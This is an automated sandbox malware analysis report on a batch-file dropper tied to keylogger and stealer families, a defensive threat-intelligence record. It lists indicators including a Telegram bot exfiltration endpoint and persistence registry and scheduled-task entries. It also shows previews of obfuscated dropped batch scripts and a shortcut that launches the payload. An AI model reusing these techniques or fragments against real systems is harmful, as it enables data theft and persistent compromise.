https://aka.ms/pscore6lB	powershell.exe, 0000000A.00000002.2191894741.0000000004C31000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/	Microsofts.exe, 00000009.00000002.3264032203.00000000012F4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lwaziacademy.com/	x.exe, 00000004.00000002.2065211434.000000000054E000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org/q	rpkhzpuO.pif, 00000007.00000002.2137347669.0000000026B04000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000009.00000000.2098416455.0000000000B72000.00000002.00000001.01000000.0000000C.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 0000000A.00000002.2191894741.0000000004D88000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 0000000A.00000002.2239304902.0000000005C98000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 0000000A.00000002.2239304902.0000000005C98000.00000004.00000800.00020000.00000000.sdmp	false		high
http://reallyfreegeoip.org	Microsofts.exe, 00000009.00000002.3277651726.0000000002EFB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.orgd	Microsofts.exe, 00000009.00000002.3277651726.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org	Microsofts.exe, 00000009.00000002.3277651726.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000009.00000002.3277651726.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.com	Microsofts.exe, 00000009.00000002.3277651726.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org/d	Microsofts.exe, 00000009.00000002.3277651726.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Microsofts.exe, 00000009.00000002.3277651726.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2191894741.0000000004C31000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.sectigo.com0C	x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096500000.00000000216FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2237819095.0000000021060000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.0000000000870000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot-/sendDocument?chat_id=	rpkhzpuO.pif, 00000007.00000002.2137347669.0000000026B04000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000009.00000000.2098416455.0000000000B72000.00000002.00000001.01000000.0000000C.sdmp	false		high
http://www.pmail.com0	x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2062232387.000000007ECEA000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.000000002069D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2098429794.00000000218E0000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmp, rpkhzpuO.pif.4.dr	false		high
https://reallyfreegeoip.org/xml/	rpkhzpuO.pif, 00000007.00000002.2137347669.0000000026B04000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000009.00000000.2098416455.0000000000B72000.00000002.00000001.01000000.0000000C.sdmp, Microsofts.exe, 00000009.00000002.3277651726.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000009.00000002.3277651726.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
41.185.8.252	lwaziacademy.com	South Africa	36943	GridhostZA	true
188.114.96.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	false
158.101.44.242	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1583899
Start date and time:	2025-01-03 20:39:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 20s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	PO#5_Tower_049.bat
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winBAT@39/18@5/3
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 97% Number of executed functions: 253 Number of non-executed functions: 58
Cookbook Comments:	Found application associated with file extension: .bat

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45, 20.242.39.171, 52.149.20.212, 4.245.163.56
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Microsofts.exe, PID 6004 because it is empty
Execution Graph export aborted for target Trading_AIBot.exe, PID 2920 because it is empty
Execution Graph export aborted for target powershell.exe, PID 1600 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: PO#5_Tower_049.bat

Simulations

Behavior and APIs

Time	Type	Description
14:39:55	API Interceptor	2x Sleep call for process: x.exe modified
14:40:06	API Interceptor	19x Sleep call for process: powershell.exe modified
14:40:09	API Interceptor	4x Sleep call for process: Oupzhkpr.PIF modified
14:40:49	API Interceptor	1078x Sleep call for process: apihost.exe modified
20:40:00	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Oupzhkpr C:\Users\Public\Oupzhkpr.url
20:40:08	Task Scheduler	Run new task: AccSys path: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe
20:40:09	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Oupzhkpr C:\Users\Public\Oupzhkpr.url
20:40:18	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
41.185.8.252	PO_B2W984.com	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse
	PO_KB#67897.cmd	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse
	PURCHASE REQUIRED DETAILS 000487958790903403.exe	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse
188.114.96.3	Gg6wivFINd.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	unasnetds.ru/eternalPython_RequestUpdateprocessAuthSqlTrafficTemporary.php
	QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/u7ghXEYp/download
	CV_ Filipa Barbosa.exe	Get hash	malicious	FormBook	Browse	www.mffnow.info/1a34/
	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	www.mydreamdeal.click/1ag2/
	SWIFT COPY 0028_pdf.exe	Get hash	malicious	FormBook	Browse	www.questmatch.pro/ipd6/
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/I7fmQg9d/download
	need quotations.exe	Get hash	malicious	FormBook	Browse	www.rtpwslot888gol.sbs/jmkz/
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/Bh1Kj4RD/download
	http://kklk16.bsyo45ksda.top	Get hash	malicious	Unknown	Browse	kklk16.bsyo45ksda.top/favicon.ico
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/XrlEIxYp/download
158.101.44.242	file.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	PO_4027_from_IC_Tech_Inc_6908.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	ZOYGRL1ePa.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	checkip.dyndns.org/
	Ziraat_Bankasi_Swift_Mesaji_TXB04958T.scr.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	Statement_3029_from_Cross_Traders_and_Logistics_ltd.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	Requested Documentation.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	Overheaped237.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	HUSDGHCE23ED.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	_Company.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	PAYMENT SWIFT AND SOA TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	W2k2NLSvja.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	FACT0987789000900.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	PO_B2W984.com	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	104.21.67.152
	file.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	file.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	file.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	PO_4027_from_IC_Tech_Inc_6908.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	image.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	DHL DOC INV 191224.gz.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	file.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
checkip.dyndns.com	W2k2NLSvja.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	FACT0987789000900.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	PO_B2W984.com	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	132.226.8.169
	file.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	file.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	file.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	PO_4027_from_IC_Tech_Inc_6908.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	image.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	DHL DOC INV 191224.gz.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	file.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
lwaziacademy.com	PO_B2W984.com	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	41.185.8.252
	PO_KB#67897.cmd	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	41.185.8.252
	PURCHASE REQUIRED DETAILS 000487958790903403.exe	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	41.185.8.252

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	http://www.cipassoitalia.it/	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	188.114.96.3
	Mj6WEKda85.exe	Get hash	malicious	DCRat	Browse	104.21.12.142
	https://rfqdocu.construction-org.com/Q5kL4/	Get hash	malicious	HTMLPhisher	Browse	104.18.11.207
	https://www.earthsatellitemaps.co/esmrel/landing.php?uid=0&lid=0&sid=531485973&sid2=1361197931118060&sid3=&sid4=google%20maps%20pro&sid5=&sid6=&sid7=&sid8=&rid=&_agid=0&aid=0&r=657&_agid=73407&msclkid=8b3e7b2e92fe1f072cfc1c5c7ae3c44d	Get hash	malicious	Unknown	Browse	104.17.25.14
	same.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar, XWorm	Browse	188.114.96.3
	m.txt.ps1	Get hash	malicious	Unknown	Browse	172.67.212.107
	https://t.co/jNNzVU90SA	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	nayfObR.exe	Get hash	malicious	LummaC	Browse	104.21.32.1
	http://www.klim.com	Get hash	malicious	Unknown	Browse	104.18.27.193
	XClient.exe	Get hash	malicious	XWorm	Browse	172.67.19.24
GridhostZA	PO_B2W984.com	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	41.185.8.252
	PO_KB#67897.cmd	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	41.185.8.252
	armv4l.elf	Get hash	malicious	Mirai	Browse	41.61.6.129
	3.elf	Get hash	malicious	Unknown	Browse	41.185.108.101
	2.elf	Get hash	malicious	Unknown	Browse	41.61.164.248
	1.elf	Get hash	malicious	Unknown	Browse	41.185.180.246
	1.elf	Get hash	malicious	Unknown	Browse	41.61.153.3
	2.elf	Get hash	malicious	Unknown	Browse	41.185.108.111
	mipsel.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	41.185.133.158
	3.elf	Get hash	malicious	Unknown	Browse	41.61.164.251
ORACLE-BMC-31898US	test.exe	Get hash	malicious	Unknown	Browse	130.61.86.87
	file.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	file.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	PO_4027_from_IC_Tech_Inc_6908.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	image.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	DHL DOC INV 191224.gz.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	Hilix.mips.elf	Get hash	malicious	Mirai	Browse	140.238.15.187
	file.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	PO_KB#67897.cmd	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	193.122.130.0
	ZOYGRL1ePa.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	158.101.44.242

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	adguardInstaller.exe	Get hash	malicious	PureLog Stealer	Browse	188.114.96.3
	W2k2NLSvja.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	FACT0987789000900.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	PO_B2W984.com	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	188.114.96.3
	file.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	file.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	file.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	PO_4027_from_IC_Tech_Inc_6908.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	image.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	DHL DOC INV 191224.gz.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
a0e9f5d64349fb13191bc781f81f42e1	HSBC_PAY.SCR.exe	Get hash	malicious	DBatLoader, FormBook	Browse	41.185.8.252
	same.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar, XWorm	Browse	41.185.8.252
	nayfObR.exe	Get hash	malicious	LummaC	Browse	41.185.8.252
	7z91gvU.exe	Get hash	malicious	LummaC	Browse	41.185.8.252
	ebjtOH70jl.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	41.185.8.252
	PO_B2W984.com	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	41.185.8.252
	file.exe	Get hash	malicious	LummaC	Browse	41.185.8.252
	file.exe	Get hash	malicious	LummaC	Browse	41.185.8.252
	image.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	41.185.8.252

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\Public\Libraries\rpkhzpuO.pif	HSBC_PAY.SCR.exe	Get hash	malicious	DBatLoader, FormBook	Browse
	PO_B2W984.com	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse
	image.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	PO_KB#67897.cmd	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse
	Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe	Get hash	malicious	DBatLoader, FormBook	Browse
	Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe	Get hash	malicious	DBatLoader, FormBook	Browse
	RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe	Get hash	malicious	DBatLoader, FormBook	Browse
	Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Get hash	malicious	DBatLoader, FormBook	Browse
	F.O Pump Istek,Docx.bat	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse
	D.G Governor Istek,Docx.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse

Created / dropped Files

C:\Users\Public\Libraries\FX.cmd

Download File

Process:	C:\Users\user\AppData\Local\Temp\x.exe
File Type:	DOS batch file, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	8556
Entropy (8bit):	4.623706637784657
Encrypted:	false
SSDEEP:	192:dSSQx41VVrTlS2owuuWTtkY16Wdhdsu0mYKDCIfYaYuX1fcDuy:Vrhgwuua5vdnQaCIVJF6uy
MD5:	60CD0BE570DECD49E4798554639A05AE
SHA1:	BD7BED69D9AB9A20B5263D74921C453F38477BCB
SHA-256:	CA6A6C849496453990BECEEF8C192D90908C0C615FA0A1D01BCD464BAD6966A5
SHA-512:	AB3DBDB4ED95A0CB4072B23DD241149F48ECFF8A69F16D81648E825D9D81A55954E5DD9BC46D3D7408421DF30C901B9AD1385D1E70793FA8D715C86C9E800C57
Malicious:	true
Preview:	@echo off..set "MJtc=Iet "..@%.r.......%e%...%c%...r....%h%.....%o%........% % .....%o%...%f%.o.%f%......%..s%.......%e%.%t%.. .....% %.rr.. .%"%...%w%......%o%...o..%t%r.....%c%....%=%... . .%s%...... %e%....%t%....% %........ %"% o...%..%wotc%"%.%n% r .%O%...%P%.. ..%t%.%=%...... o..%=%......%"%....r...%..%wotc%"aeeYdDdanR%nOPt%s://"..%wotc%"%..........%a%.%e%......%e%.r..%Y%..%d%.....r....%D%.. %d% ... .%a%.. ...%n%.. ..%R%........%%nOPt%s%...... .%:%.. %/%....%/%r......%"%.....r.%..%wotc%"%...... ...%U%.o..%g%.r.%

C:\Users\Public\Libraries\NEO.cmd

Download File

Process:	C:\Users\user\AppData\Local\Temp\x.exe
File Type:	DOS batch file, Unicode text, UTF-8 text, with very long lines (420), with CRLF line terminators
Category:	dropped
Size (bytes):	46543
Entropy (8bit):	4.705001079878445
Encrypted:	false
SSDEEP:	768:Ud6T6yIssKMyD/LgZ0+9Z2noufIBUEADZQp2H8ZLq:UdQFIssKMyjL4X2T8UbZT
MD5:	637A66953F03B084808934ED7DF7192F
SHA1:	D3AE40DFF4894972A141A631900BD3BB8C441696
SHA-256:	41E1F89A5F96F94C2C021FBC08EA1A10EA30DAEA62492F46A7F763385F95EC20
SHA-512:	2A0FEDD85722A2701D57AA751D5ACAA36BBD31778E5D2B51A5A1B21A687B9261F4685FD12E894244EA80B194C76E722B13433AD9B649625D2BC2DB4365991EA3
Malicious:	false
Preview:	@echo off..set "EPD=sPDet "..@%...... or%e%.........%c%......%h%.........o%o%.or......% %.o.ro...%o%.%f%...r.....%f%....r....%..s%. %e%.....%t% % % rrr....%"%.....%E%....%J%.. ....%O%.%h% .......%=%........%s%.. ..%e%....%t%....% %...o...%"%.%..%EJOh%"%.%r% %H%..%C%........%N%....o ....%=%..........%=% .%"%..%..%EJOh%"%.....%K%.%z%..r%j%........%L%..%c%. o.......%f%. o..%x%.%X%.........r%V%.%J%.....%%rHCN%k%.... ...%"%........%..%EJOh%"%.o.....%a%or%g%..o.... ..%u% ..%P%.....o...%X%.. .......%c% .....%U%.%I%. .

C:\Users\Public\Libraries\Oupzhkpr

Download File

Process:	C:\Users\user\AppData\Local\Temp\x.exe
File Type:	data
Category:	dropped
Size (bytes):	679957
Entropy (8bit):	7.4483963454083435
Encrypted:	false
SSDEEP:	12288:2H+NXHhlVBcqgRbPaltoM6OwLovLA/eimwQUaq3cF2ez06hNg+Ymnch:2qHX8RbyfovtLovLA/eim/ccF2ez06hO
MD5:	25A482D7B6698E7666A523C910799F13
SHA1:	18B17A1E14069E747F5076F97A9654D8D99E5ADA
SHA-256:	4C1614F48CC1998B7E1F23C15AB0F0E2F4C9356EC05FF413FC5BE98D98EC8ACB
SHA-512:	5525D32CB43E6976D8F04EB60281DC7194E8FBC05D39098FD9EBA5E0BDD50C9246A5FA8A88A601940369A97589351F848AD0AB56D6B5B97470FCDBF076572AAE
Malicious:	true
Preview:	...8...............................................................................................8...9.............8...*............................................................................................................................................................................{.."..~.......{..........!.......#...............!.......}................... .(...{.'......\|).%.... .........~.........$..\|... ..%}.~.....................#\|....{...{...........{....('..~.%....~.........}...\|...............$...................$.....\|{.$.~\|.....\|.\|.......}$..... .\|~.. ...'......$."~...#!...#........!..\|...~...\|.{....~\|...... ........}......&.........~{.........&\|... ............ ...!.......%...............}.....$..........{....\|...........~%.....\|...}...#..%.{....&.........(...{.....#!. .......\|.....#....{...........................~%.................}}.......{......\|...........).....\|.\|....%"...\|........(..FFI.S.J.<.N.

C:\Users\Public\Libraries\Oupzhkpr.PIF

Download File

Process:	C:\Users\user\AppData\Local\Temp\x.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1242624
Entropy (8bit):	7.0624316017893145
Encrypted:	false
SSDEEP:	24576:PP+c4OuuuRyxjoSJmjtHXyzvWZS2kCxG2JRxVuYbdxiHA:PmJjW4ZHXyB2kX2Jv/bdx
MD5:	EE363121466EE051042410AFFFEA28EF
SHA1:	F528897FD071AF01778FB37BC3D6E320012176A8
SHA-256:	CD73EEBF2B36EB1BC4DFD5C4D5337AE41E5C49346523CB03202F116DFC838533
SHA-512:	5DC645388DE2F6B17207F78BACED71947874B7813C6DAE129F00AB6FC965DB956ABE8025E706F4A68153FEFFC49EDF2459320846C1D508D733C14B6E4A4BA77B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B..................................... ....@..............................................@...............................(...p..................................................................................L............................text...@........................... ..`.itext.............................. ..`.data....)... .....................@....bss.....8...P...........................idata...(.......*..................@....tls....4............X...................rdata...............X..............@..@.reloc...............Z..............@..B.rsrc........p......................@..@....................................@..@................................................................................................

C:\Users\Public\Libraries\rpkhzpuO.pif

Download File

Process:	C:\Users\user\AppData\Local\Temp\x.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	175800
Entropy (8bit):	6.631791793070417
Encrypted:	false
SSDEEP:	3072:qjyOm0e6/bIhbuwxlEb1MpG+xUEyAn0fYuDGOpPXFZ7on+gUxloDMq:qjyl6ebX45OG+xUEWfYUGOpPXFZ7on+G
MD5:	22331ABCC9472CC9DC6F37FAF333AA2C
SHA1:	2A001C30BA79A19CEAF6A09C3567C70311760AA4
SHA-256:	BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
SHA-512:	C7F5BAAD732424B975A426867D3D8B5424AA830AA172ED0FF0EF630070BF2B4213750E123A36D8C5A741E22D3999CA1D7E77C62D4B77D6295B20A38114B7843C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Joe Sandbox View:	Filename: HSBC_PAY.SCR.exe, Detection: malicious, Browse Filename: PO_B2W984.com, Detection: malicious, Browse Filename: image.exe, Detection: malicious, Browse Filename: PO_KB#67897.cmd, Detection: malicious, Browse Filename: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, Detection: malicious, Browse Filename: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, Detection: malicious, Browse Filename: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, Detection: malicious, Browse Filename: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, Detection: malicious, Browse Filename: F.O Pump Istek,Docx.bat, Detection: malicious, Browse Filename: D.G Governor Istek,Docx.exe, Detection: malicious, Browse
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....>.{..................................... ....@.......................... .......c........... ..............................................................H....................................................................................text............................... ..`.data........ ...P..................@....tls.................`..............@....rdata...............b..............@..P.idata... ...........d..............@..@.edata...............\|..8...,...@...@..@

C:\Users\Public\Oupzhkpr.url

Download File

Process:	C:\Users\user\AppData\Local\Temp\x.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Oupzhkpr.PIF">), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	104
Entropy (8bit):	5.149476016735825
Encrypted:	false
SSDEEP:	3:HRAbABGQYmTWAX+rSF55i0XM1N6XL3vsbxlZQu:HRYFVmTWDyzKNafExlZQu
MD5:	BE3306A22DECEE7D299B1F6147BA99A4
SHA1:	3B8A878515BBE39FCF398DB9382C1DD56B5AB582
SHA-256:	8BFF29AFAC83F3F546A806EE577E999B8090556053D6D2C127300821EA5928EE
SHA-512:	8B9A84385D2999D20545162AA73A3EFBBA203FC1ADAE834B7E9D54BF6010B30C0EAF6B740564766DE62CB6F2E14ABC2BBCEAC6E7A2F17102B84CB25D0D88726C
Malicious:	true
Preview:	[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Oupzhkpr.PIF"..IconIndex=922199..HotKey=33..

C:\Users\Public\OupzhkprF.cmd

Download File

Process:	C:\Users\user\AppData\Local\Temp\x.exe
File Type:	DOS batch file, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	15789
Entropy (8bit):	4.658965888116939
